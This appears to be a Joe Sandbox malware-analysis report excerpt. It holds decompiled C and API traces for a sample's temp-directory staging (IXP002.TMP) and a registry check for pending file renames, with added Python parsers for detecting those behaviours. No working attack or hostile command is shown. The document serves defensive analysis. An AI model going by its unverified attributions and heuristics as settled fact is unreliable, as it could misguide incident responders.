                                                                                                                                                                                                    0x0013458f
                                                                                                                                                                                                    0x0013458f
                                                                                                                                                                                                    0x00134591
                                                                                                                                                                                                    0x00134592
                                                                                                                                                                                                    0x0013459b
                                                                                                                                                                                                    0x0013459e
                                                                                                                                                                                                    0x001345a3
                                                                                                                                                                                                    0x001345a9
                                                                                                                                                                                                    0x001345ad
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001345af
                                                                                                                                                                                                    0x001345af
                                                                                                                                                                                                    0x001345bf
                                                                                                                                                                                                    0x0013462d
                                                                                                                                                                                                    0x00134630
                                                                                                                                                                                                    0x0013463d
                                                                                                                                                                                                    0x0013464e
                                                                                                                                                                                                    0x0013464e
                                                                                                                                                                                                    0x0013463f
                                                                                                                                                                                                    0x00134640
                                                                                                                                                                                                    0x00134647
                                                                                                                                                                                                    0x0013464c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013464c
                                                                                                                                                                                                    0x00134666
                                                                                                                                                                                                    0x0013466d
                                                                                                                                                                                                    0x0013466f
                                                                                                                                                                                                    0x00134675
                                                                                                                                                                                                    0x00134675
                                                                                                                                                                                                    0x001345ad
                                                                                                                                                                                                    0x00134527
                                                                                                                                                                                                    0x0013452e
                                                                                                                                                                                                    0x0013453f
                                                                                                                                                                                                    0x0013453f
                                                                                                                                                                                                    0x00134530
                                                                                                                                                                                                    0x00134531
                                                                                                                                                                                                    0x00134538
                                                                                                                                                                                                    0x0013453d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013453d
                                                                                                                                                                                                    0x00134554
                                                                                                                                                                                                    0x0013455a
                                                                                                                                                                                                    0x0013455a
                                                                                                                                                                                                    0x0013455a
                                                                                                                                                                                                    0x00134525
                                                                                                                                                                                                    0x0013468c

APIs
• LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
• MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
• LocalAlloc.KERNEL32(00000040,00000065), ref: 001345A3
• LocalAlloc.KERNEL32(00000040,00000065), ref: 001345E3
• LocalAlloc.KERNEL32(00000040,00000002), ref: 0013460D
• MessageBeep.USER32(00000000), ref: 00134630
• MessageBoxA.USER32(?,00000000,nst0dum,00000000), ref: 00134666
• LocalFree.KERNEL32(00000000), ref: 0013466F
  • Part of subcall function 0013681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0013686E
  • Part of subcall function 0013681F: GetSystemMetrics.USER32(0000004A), ref: 001368A7
  • Part of subcall function 0013681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001368CC
  • Part of subcall function 0013681F: RegQueryValueExA.ADVAPI32(?,00131140,00000000,?,?,0000000C), ref: 001368F4
  • Part of subcall function 0013681F: RegCloseKey.ADVAPI32(?), ref: 00136902
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
• String ID: LoadString() Error. Could not load string resource.$nst0dum
• API String ID: 3244514340-614204707
• Opcode ID: bfad095fe5566a2d6cb407bc88a551c5c3f97415874f80830b26ec308207535f
• Instruction ID: 1a577a8bdeec15702766f8aed27cfdd6e65880d0890a0b03dbdfb274e186744e
• Opcode Fuzzy Hash: bfad095fe5566a2d6cb407bc88a551c5c3f97415874f80830b26ec308207535f
• Instruction Fuzzy Hash: A75104B2A00219AFDB219F28CC49BBA7B79EF45300F1441A4FD49B7241DB71EE45CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 95%
                                                                                                                                                                                                    			E001353A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                    				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x138004; // 0xe764604f
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0013171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00131680(_t32, 0x104, _t20);
					E0013658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00136CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x138a20 = 1;
				goto L5;
			}

APIs
  • Part of subcall function 0013171E: _vsnprintf.MSVCRT ref: 00131750
• RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001353FB
• GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135402
• GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013541F
• DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013542B
• CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135434
• CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135452
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
• API String ID: 1082909758-3361814588
• Opcode ID: 5665faa7df3e1d9dfbaecab8e99c143f8da94919ecadfe750869ffe45bb3aa2b
• Instruction ID: 219de3cf0d072d90cfa409c413b35fc0d66e54d54326062678e5e48532e5fa06
• Opcode Fuzzy Hash: 5665faa7df3e1d9dfbaecab8e99c143f8da94919ecadfe750869ffe45bb3aa2b
• Instruction Fuzzy Hash: DD1123B130060477D3289B369C49FAF3A6EEFD1721F400125FA86D2690DF74898286A2
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; executed / not executed blocks were colour-coded in the original)

C-Code - Quality: 75%
			E00135467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x138004; // 0xe764604f
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x1391e4;
					_t42 = 0x104;
					E00131680(0x1391e4, 0x104);
					L14:
					_t13 = E001358C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x139124 = 0;
							_t14 = 1;
							L24:
							return E00136CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0013597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x138a20; // 0x0
						if(_t61 != 0) {
							 *0x138a20 = 0;
							RemoveDirectoryA(_t48);
						}
                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                    						_t14 = 0;
                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                    						 *0x139124 = E00136285();
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x138a20 = 1;
                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 =  &_v268;
                                                                                                                                                                                                    				_t20 = E001353A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t48 = 0x1391e4;
                                                                                                                                                                                                    				E00131781(0x1391e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                    				if(( *0x139a34 & 0x00000020) == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E0013658A(_t48, 0x104, 0x131140);
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				GetSystemInfo( &_v304);
                                                                                                                                                                                                    				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					_push("i386");
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					E0013658A(_t48, 0x104);
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}




















Per-line instruction addresses for the listing above (the report's side column, detached from its lines by extraction): they range from 0x00135472 to 0x0013559D; entries of 0x00000000 have no mapped address.

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001354C9
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013553D
• RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013556F
  • Part of subcall function 001353A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001353FB
  • Part of subcall function 001353A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135402
  • Part of subcall function 001353A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013541F
  • Part of subcall function 001353A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013542B
  • Part of subcall function 001353A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135434
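The API list above records the whole lifecycle of the IXP002.TMP staging directory: CreateDirectoryA on the path, the subcall 001353A1 probing it with GetFileAttributesA, GetTempFileNameA (prefix IXP) and DeleteFileA, and RemoveDirectoryA when a later step fails. The IXPnnn.TMP naming under %TEMP% is the convention of IExpress self-extracting packages, which is the first thing a responder should look for on the host. The parser below is an added example and is not part of the Joe Sandbox report or of the sample's code: it reads lines in the report's own format, recovers API name, module, arguments, calling function and address, and reconstructs which APIs touch the staging directory. Only each API's real path parameter (the first argument for these calls) is matched, because the trailing values on each line are stack residue that repeat the path. The eight input lines are copied from the list above; the STAGING_DIR_RE pattern, the function names and the is_sfx_staging heuristic are this example's own choices.

```python
"""Added example: parse Joe Sandbox 'APIs' lines and reconstruct the staging-directory lifecycle."""
import re
from collections import OrderedDict

# Constructed input: the eight API lines copied verbatim from the report section above.
API_LOG = r"""
• GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001354C9
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013553D
• RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013556F
  • Part of subcall function 001353A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001353FB
  • Part of subcall function 001353A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135402
  • Part of subcall function 001353A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013541F
  • Part of subcall function 001353A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013542B
  • Part of subcall function 001353A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135434
"""

# One report line: optional "Part of subcall function XXXX:" prefix, API.MODULE(args), ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# This example's own pattern for the IExpress-style staging directory seen in this run.
STAGING_DIR_RE = re.compile(r"\\Temp\\IXP\d{3}\.TMP\\?$", re.IGNORECASE)

# Index of the real path parameter for each API of interest (all of these take it first).
PATH_ARG = {"CreateDirectoryA": 0, "RemoveDirectoryA": 0, "GetTempFileNameA": 0,
            "GetFileAttributesA": 0, "DeleteFileA": 0}


def parse_api_log(text):
    """Turn report lines into dicts; lines that do not match the format are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "api": m["api"],
            "module": m["module"],
            "args": [a.strip() for a in m["args"].split(",")],
            "ref": int(m["ref"], 16),
            "caller": m["caller"],  # None for calls made by the listed function itself
        })
    return events


def staging_dir_lifecycle(events):
    """Map each staging directory to the ordered APIs whose path parameter names it.

    Only the API's real path parameter is matched: the values Joe Sandbox prints
    after it are stack residue that repeats the path and would over-count.
    """
    lifecycle = OrderedDict()
    for ev in events:
        idx = PATH_ARG.get(ev["api"])
        if idx is None or idx >= len(ev["args"]):
            continue
        path = ev["args"][idx]
        if STAGING_DIR_RE.search(path):
            lifecycle.setdefault(path, []).append(ev["api"])
    return lifecycle


def temp_file_prefixes(events):
    """Prefixes handed to GetTempFileNameA (its lpPrefixString, the second argument)."""
    return sorted({ev["args"][1] for ev in events
                   if ev["api"] == "GetTempFileNameA" and len(ev["args"]) > 1})


def is_sfx_staging(events):
    """Heuristic (this example's own): a staging directory that the same sample both
    creates and removes matches the create-then-cleanup logic of the decompiled
    function above."""
    return any("CreateDirectoryA" in apis and "RemoveDirectoryA" in apis
               for apis in staging_dir_lifecycle(events).values())


if __name__ == "__main__":
    evs = parse_api_log(API_LOG)
    for path, apis in staging_dir_lifecycle(evs).items():
        print(path, "->", " / ".join(apis))
    print("temp file prefixes:", temp_file_prefixes(evs))
    print("create-then-cleanup staging pattern:", is_sfx_staging(evs))
```

On the report's lines this yields one directory, touched by CreateDirectoryA, RemoveDirectoryA and GetTempFileNameA in that order, with IXP as the only temp-file prefix. A directory that is created and later removed by the same process leaves little on disk, so the hunt artifact is the event stream (Sysmon file-create and directory events under %TEMP%\IXP*.TMP) rather than the directory itself.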
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                    • API String ID: 1979080616-510557316
                                                                                                                                                                                                    • Opcode ID: b8dd9f409f67b51eb62c68dd62439a9845f43b79a51a62f7c660efe7c6ec5101
                                                                                                                                                                                                    • Instruction ID: 2a2f469318f8b2c94228e5833d47301fbb271503b5610c4184dbd6db7f61405e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8dd9f409f67b51eb62c68dd62439a9845f43b79a51a62f7c660efe7c6ec5101
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F3148B1B00B106BCB149F399C4597F7BABBFA1B50F05012AF846D3940DFB0DE818691
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 563 13256d-13257d 564 132583-132589 563->564 565 132622-132627 call 1324e0 563->565 567 13258b 564->567 568 1325e8-132607 RegOpenKeyExA 564->568 573 132629-13262f 565->573 572 132591-132595 567->572 567->573 569 1325e3-1325e6 568->569 570 132609-132620 RegQueryInfoKeyA 568->570 569->573 574 1325d1-1325dd RegCloseKey 570->574 572->573 575 13259b-1325ba RegOpenKeyExA 572->575 574->569 575->569 576 1325bc-1325cb RegQueryValueExA 575->576 576->574
C-Code - Quality: 86%
			E0013256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				// Decompiler output as emitted by Joe Sandbox. The trailing 0x... value on each
				// statement is the instruction address the decompiler attributes to it (0x00000000
				// where a statement has no address); in the report these sat in a separate column.
				// Comments beginning with "note:" are editorial reading of the code, not decompiler
				// output. 0x80000002 is HKEY_LOCAL_MACHINE and 0x20019 is KEY_READ.
				_push(__ecx);	// 0x00132572
				_push(__ecx);	// 0x00132573
				_t13 = __ecx & 0x0000ffff;	// 0x00132575  note: mode selector is the low 16 bits of ecx
				_t31 = 0;	// 0x00132578
				if(_t13 == 0) {	// 0x0013257d
					_t31 = E001324E0(_t26);	// 0x00132627  note: mode 0 delegates to E001324E0
				} else {	// 0x00132583
					_t34 = _t13 - 1;	// 0x00132586
					if(_t34 == 0) {	// 0x00132589  note: mode 1: number of values under ...\Session Manager\FileRenameOperations
						_v8 = 0;	// 0x001325eb
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {	// 0x00132607
							goto L7;	// 0x00000000
						} else {	// 0x00132609
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);	// 0x0013261a  note: the 8th argument is lpcValues, so _v8 receives the value count
							goto L6;	// 0x00000000
						}	// 0x0013261a
						L12:	// 0x00000000
					} else {	// 0x0013258b
						if(_t34 > 0 && __ecx <= 3) {	// 0x0013258b  note: modes 2 and 3: does PendingFileRenameOperations exist under ...\Session Manager
							_v8 = 0;	// 0x0013259e
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed	// 0x001325b2
							if(_t24 == 0) {	// 0x001325ba
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed	// 0x001325cb  note: lpData is NULL, so _v8 receives the required size (non-zero only if the value exists)
								L6:	// 0x001325d1
								asm("sbb eax, eax");	// 0x001325d6
								_v8 = _v8 &  !( ~_t19);	// 0x001325da  note: reads as the neg/sbb/not/and idiom; the likely intent is that _v8 is kept only when _t19 is ERROR_SUCCESS and zeroed otherwise
								RegCloseKey(_v12); // executed	// 0x001325dd
							}	// 0x001325dd
							L7:	// 0x001325e3
							_t31 = _v8;	// 0x001325e3  note: a non-zero return means a pending file rename/delete was found
						}	// 0x001325e3
					}	// 0x0013258b
				}	// 0x00132589
				return _t31;	// 0x0013262f
				goto L12;	// 0x00000000  note: unreachable after return; decompiler artifact
			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00134096,00134096,?,00131ED3,00000001,00000000,?,?,00134137,?), ref: 001325B2
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00134096,?,00131ED3,00000001,00000000,?,?,00134137,?,00134096), ref: 001325CB
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00131ED3,00000001,00000000,?,?,00134137,?,00134096), ref: 001325DD
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00134096,00134096,?,00131ED3,00000001,00000000,?,?,00134137,?), ref: 001325FF
                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00134096,00000000,00000000,00000000,00000000,?,00131ED3,00000001,00000000), ref: 0013261A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 001325A8
                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 001325C3
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001325F5
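The two behaviours this section records, the reboot-pending registry probe in E0013256D (RegOpenKeyExA on HKLM\...\Session Manager followed by RegQueryValueExA for PendingFileRenameOperations) and the IXP002.TMP temp-directory handling in the 001353A1 subcall, can be picked out of the report's APIs lines mechanically. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses bullet lines in the format shown above into records and runs two checks over them. The parser, the check names and their matching rules are assumptions of this example; the five sample lines are copied from this section.

```python
# Added example (not from the Joe Sandbox report): parse the report's "APIs"
# trace lines into records and evaluate two behavioural checks over them, the
# reboot-pending registry probe seen in E0013256D and the IXPnnn.TMP temp
# directory handling seen in the 001353A1 subcall.
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Constructed input: five trace lines copied from this report section.
SAMPLE_TRACE = r"""
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00134096,00134096,?,00131ED3,00000001,00000000,?,?,00134137,?), ref: 001325B2
• RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00134096,?,00131ED3,00000001,00000000,?,?,00134137,?,00134096), ref: 001325CB
• RegCloseKey.KERNELBASE(?,?,00131ED3,00000001,00000000,?,?,00134137,?,00134096), ref: 001325DD
• Part of subcall function 001353A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013541F
• Part of subcall function 001353A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135434
"""

# One trace line: optional "Part of subcall function X:" prefix, then
# API.MODULE(args), ref: ADDR. The report does not quote arguments, so they
# are split on commas; an argument that itself contained a comma would be
# split as well (none of the sample lines has one).
LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

HKEY_LOCAL_MACHINE = "80000002"  # hKey argument exactly as the report prints it


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str] = None  # set when the line is "Part of subcall function"


def parse_trace(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an APIs block into ApiCall records, skipping
    headings, blank lines and Strings entries that do not match the format."""
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")]
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def reboot_pending_probe(calls: List[ApiCall]) -> Optional[Tuple[str, str]]:
    """Return (open_ref, query_ref) when an HKLM open of ...\\Control\\Session
    Manager is followed, before the handle is closed, by a RegQueryValueExA
    for PendingFileRenameOperations; None otherwise. Mirrors E0013256D."""
    open_ref = None
    for c in calls:
        if (c.api == "RegOpenKeyExA" and len(c.args) >= 2
                and c.args[0] == HKEY_LOCAL_MACHINE
                and c.args[1].lower().endswith(r"control\session manager")):
            open_ref = c.ref
        elif c.api == "RegQueryValueExA" and open_ref \
                and "PendingFileRenameOperations" in c.args:
            return open_ref, c.ref
        elif c.api == "RegCloseKey":
            open_ref = None  # handle released; a later query no longer counts
    return None


def ixp_temp_dirs(calls: List[ApiCall]) -> Set[str]:
    """Collect every <...>\\IXPnnn.TMP path that appears in any argument."""
    found = set()
    for c in calls:
        for a in c.args:
            if re.search(r"\\IXP\d{3}\.TMP\\?$", a, re.IGNORECASE):
                found.add(a)
    return found


if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    print(len(trace), "calls parsed")
    print("reboot-pending probe:", reboot_pending_probe(trace))
    print("IXP temp dirs:", sorted(ixp_temp_dirs(trace)))
```

Run against the five sample lines, parse_trace yields five records, reboot_pending_probe returns the refs of the RegOpenKeyExA and RegQueryValueExA pair (001325B2, 001325CB), and ixp_temp_dirs returns the single IXP002.TMP path. Because RegCloseKey resets the open handle, the rule only fires when the query follows the open of the same key, which keeps unrelated RegQueryValueExA calls from matching.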
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
